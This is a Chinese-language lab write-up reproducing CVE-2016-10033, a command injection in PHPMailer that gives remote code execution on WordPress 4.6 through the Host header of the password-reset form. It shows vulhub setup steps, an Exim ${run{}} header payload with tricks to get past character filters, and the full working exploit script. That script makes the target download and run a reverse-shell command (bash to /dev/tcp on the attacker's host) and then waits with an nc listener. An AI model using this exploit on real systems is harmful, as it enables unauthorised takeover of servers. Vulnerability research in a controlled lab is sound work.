WordPress 4.6 任意命令执行漏洞(CVE-2016-10033,PHPMailer 命令注入)
2022-07-29 10:13:20

1、简介

WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。

2、影响版本

WordPress <= 4.6.0(问题出在其自带的 PHPMailer < 5.2.18,即 CVE-2016-10033;修复方式是升级到自带 PHPMailer >= 5.2.18 的 WordPress 版本)

3、环境搭建

我们这里使用vulhub和docker搭建环境

cd vulhub/wordpress/pwnscriptum

docker-compose build

docker-compose up -d

4、漏洞复现

访问 http://your-ip:8080/ 打开站点,初始化管理员用户名和密码后即可使用(数据库等已经配置好,且不会自动更新)。下文的 payload 和 PoC 都以用户名 admin 为例,初始化时请使用该用户名,或者相应修改 PoC 中的用户名。

漏洞触发点在找回密码功能(wp-login.php?action=lostpassword)。该请求无需登录;WordPress 会用请求中的 Host 头拼出发件人地址,PHPMailer 再把这个地址拼进 sendmail 的命令行(本环境中的 sendmail 是 Exim),因此 Host 头里的 -be 和 Exim 字符串展开 ${run{...}} 会被当作 Exim 参数处理,从而在目标上执行命令。

要让命令成功执行,需要满足以下几点:

1. 执行的命令中不能包含某些特殊字符,例如 :、'、" 和管道符等。
2. 注入的命令会被转为小写,因此命令里不能依赖大写字母(这也是下面的 PoC 先让目标把真正的反弹 shell 命令下载到 /tmp/rce、再执行该文件的原因)。
3. 命令中的程序需要使用绝对路径。
4. 需要知道一个已存在的用户名,这里是 admin。

 

绕过以上限制的方法(注意:这是攻击方构造 payload 的技巧,不是漏洞的修复方法)

1、payload 中 run{} 里面所有的 / 用 ${substr{0}{1}{$spool_directory}} 代替(取 Exim 变量 $spool_directory 的第一个字符,它是绝对路径,所以首字符就是 /)。
2、payload 中 run{} 里面所有的空格用 ${substr{10}{1}{$tod_log}} 代替(取 $tod_log 的第 11 个字符,即 "YYYY-MM-DD HH:MM:SS" 中日期和时间之间的那个空格)。

验证用 Payload(作为 Host 头发送),等价于在目标上执行 /bin/touch /tmp/success,发送后可进入容器检查 /tmp/success 是否生成:

target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

PoC(Dawid Golunski 的 wordpress-rce-exploit.sh;使用前需把脚本里的 rev_host 改成目标能访问到的攻击机地址)

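#!/bin/bash
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033 -- PHPMailer < 5.2.18 as bundled with WordPress <= 4.6.0
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
# Discovered and coded by Dawid Golunski (@dawid_golunski)
#   https://legalhackers.com
#   https://ExploitBox.io
# Full advisory URL:
#   https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
# Exploit src URL:
#   https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
# Tested on WordPress 4.6:
#   https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
#   ./wordpress-rce-exploit.sh target-wordpress-url [wordpress-username]
#
#   REV_HOST  (env) address the target connects back to; default
#             192.168.20.128. It must be reachable FROM the target, and it
#             must be lower-case because the injected string is lower-cased.
#
# How it works:
#   The lost-password form (wp-login.php?action=lostpassword) needs no login
#   and builds the mail sender from the request's Host header. PHPMailer
#   places that sender on the sendmail command line (Exim on the target,
#   judging by the -be / ${run{...}} syntax used here), so a Host header
#   carrying "-be" plus an Exim ${run{...}} expansion makes Exim run a
#   command. The header may not contain quotes, ':' or '|', is lower-cased
#   and needs absolute paths, so the real reverse-shell command is first
#   fetched over HTTP into /tmp/rce and only then executed.
#
# Disclaimer: for authorised testing purposes only.
#
# (The base64-encoded ASCII-art banner of the original script is not
#  reproduced in this copy; it was purely cosmetic.)

set -euo pipefail

readonly rev_host="${REV_HOST:-192.168.20.128}"
readonly rev_port=1337        # reverse-shell listener port
readonly http_port=80         # staging HTTP server port (needs root)
readonly payload_file=rce.txt # staged reverse-shell command, served over HTTP

host_header=""   # written by prep_host_header
hpid=""          # PID of the staging HTTP server, killed by cleanup

#######################################
# Wrap a shell command line in an Exim ${run{...}} expansion and build the
# malicious Host header value.
# Globals:   host_header (written)
# Arguments: $1 - command line to run on the target; absolute paths only,
#            lower-case only, no quotes, ':' or '|'. '/' and ' ' are
#            rewritten here because they cannot be sent in the header.
# Returns:   0
#######################################
prep_host_header() {
  local cmd=$1
  # Produce '/' and ' ' at Exim expansion time instead of sending them:
  # $spool_directory is an absolute path, so its first character is '/';
  # $tod_log is "YYYY-MM-DD HH:MM:SS", so its 11th character is a space.
  local slash='${substr{0}{1}{$spool_directory}}'
  local space='${substr{10}{1}{$tod_log}}'
  local rce_cmd="\${run{${cmd}}}"
  rce_cmd="${rce_cmd//\//${slash}}"
  rce_cmd="${rce_cmd// /${space}}"
  # "-be" switches Exim to expansion-test mode, in which ${run{...}} is
  # evaluated; the surrounding text keeps the sender syntactically valid.
  host_header="target(any -froot@localhost -be ${rce_cmd} null)"
  return 0
}

#######################################
# Print a green-tagged status line in the style of the original exploit.
# Arguments: $1 - tag character ('*' or '+'); $2 - message
#######################################
say() {
  printf '\e[92m[%s]\e[0m %s\n' "$1" "$2"
}

#######################################
# Submit the lost-password form with a crafted Host header.
# Arguments: $1 - target base URL; $2 - Host header value; $3 - username;
#            any further arguments are passed through to curl (e.g. -s)
# Outputs:   the response body (useful: an "Invalid username" page shows
#            that $3 does not exist on the target)
# Returns:   curl's exit status
#######################################
send_lostpassword() {
  local target=$1 header=$2 user=$3
  shift 3
  # The URL is quoted: an unquoted '?' would be subject to pathname expansion.
  curl -H "Host: ${header}" "$@" \
    --data-urlencode "user_login=${user}" \
    -d 'wp-submit=Get+New+Password' \
    "${target}/wp-login.php?action=lostpassword"
}

#######################################
# Serve the current directory (which holds $payload_file) on $http_port.
# Globals:   hpid (written), http_port (read)
#######################################
start_http_server() {
  # python3 ships http.server; SimpleHTTPServer exists only on python2.
  if command -v python3 >/dev/null 2>&1; then
    python3 -m http.server "${http_port}" >/dev/null 2>&1 &
  else
    python -m SimpleHTTPServer "${http_port}" >/dev/null 2>&1 &
  fi
  hpid=$!
}

#######################################
# Stop the staging server and remove the staged payload on any exit path.
# Globals:   hpid, payload_file (read)
#######################################
cleanup() {
  if [[ -n "${hpid}" ]]; then
    kill "${hpid}" 2>/dev/null || true
  fi
  rm -f -- "${payload_file}"
}

#######################################
# Entry point: confirm, stage the payload, trigger it twice via the
# lost-password form, then wait for the reverse shell.
# Arguments: $1 - target WordPress base URL; $2 - username (default admin)
#######################################
main() {
  if (( $# < 1 || $# > 2 )); then
    printf 'Usage:\n%s target-wordpress-url [wordpress-username]\n\n' "$0" >&2
    exit 1
  fi
  local target=${1%/}      # tolerate a trailing slash on the URL
  local user=${2:-admin}   # must be an existing WordPress user

  # rev_host ends up inside the Host header, which the target lower-cases;
  # an upper-case hostname would silently point at the wrong host.
  if [[ "${rev_host}" != "${rev_host,,}" ]]; then
    printf 'REV_HOST must be lower-case (the injected string is lower-cased): %s\n' "${rev_host}" >&2
    exit 1
  fi

  local choice
  printf '\e[91m[*]\e[0m'
  read -r -p " Sure you want to get a shell on the target '${target}' ? [y/N] " choice
  echo
  if [[ "${choice}" != [yY] ]]; then
    say '+' 'Responsible choice ;) Exiting.'
    echo
    exit 0
  fi
  say '*' "Guess I can't argue with that... Let's get started..."
  echo
  say '+' 'Connected to the target'

  trap cleanup EXIT

  # Stage 1: write the real command to rce.txt and serve it over HTTP, so it
  # escapes the Host-header restrictions (lower-casing, no quotes/':'/'|').
  # The sleep gives this script time to start its listener (below) before
  # the target connects back.
  local rce_exec_cmd="(sleep 3 && nohup bash -i >/dev/tcp/${rev_host}/${rev_port} 0<&1 2>&1) &"
  printf '%s\n' "${rce_exec_cmd}" > "${payload_file}"
  start_http_server

  # Stage 2: make the target download rce.txt to /tmp/rce. Absolute path and
  # lower-case only; the spaces and slashes are rewritten by prep_host_header.
  prep_host_header "/usr/bin/curl -o/tmp/rce ${rev_host}/${payload_file}"
  send_lostpassword "${target}" "${host_header}" "${user}" -s
  echo
  say '+' 'Payload sent successfully'

  # Stage 3: execute /tmp/rce. Backgrounded so a slow response cannot delay
  # starting the listener, which must be up within the payload's 3 s sleep.
  prep_host_header "/bin/bash /tmp/rce"
  send_lostpassword "${target}" "${host_header}" "${user}" -s &
  echo
  say '+' 'Payload executed!'
  printf '\n\e[92m[*]\e[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n\n'
  # Traditional netcat syntax (-p together with -l), as in the original.
  nc -nvv -l -p "${rev_port}" || printf 'listener exited with status %d\n' "$?" >&2
  echo
  echo "Exiting..."
  exit 0
}

main "$@"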

脚本内部会自己在 80 端口启动一个 python HTTP 服务来分发 rce.txt;如果要手动启动,必须在脚本所在目录(rce.txt 生成的目录)执行,否则目标下载不到 rce.txt。注意此时脚本自带的服务会因端口被占用而启动失败,且其输出被重定向到 /dev/null,不会有任何提示:

python -mSimpleHTTPServer 80

sudo ./exploit.sh http://192.168.20.128:8080

说明:sudo 是为了监听 80 端口;这里攻击机和 docker 宿主机同为 192.168.20.128,脚本中的 rev_host 必须是目标容器能访问到的攻击机地址,目标会向它的 80 端口下载 rce.txt、并把 shell 反弹到它的 1337 端口。
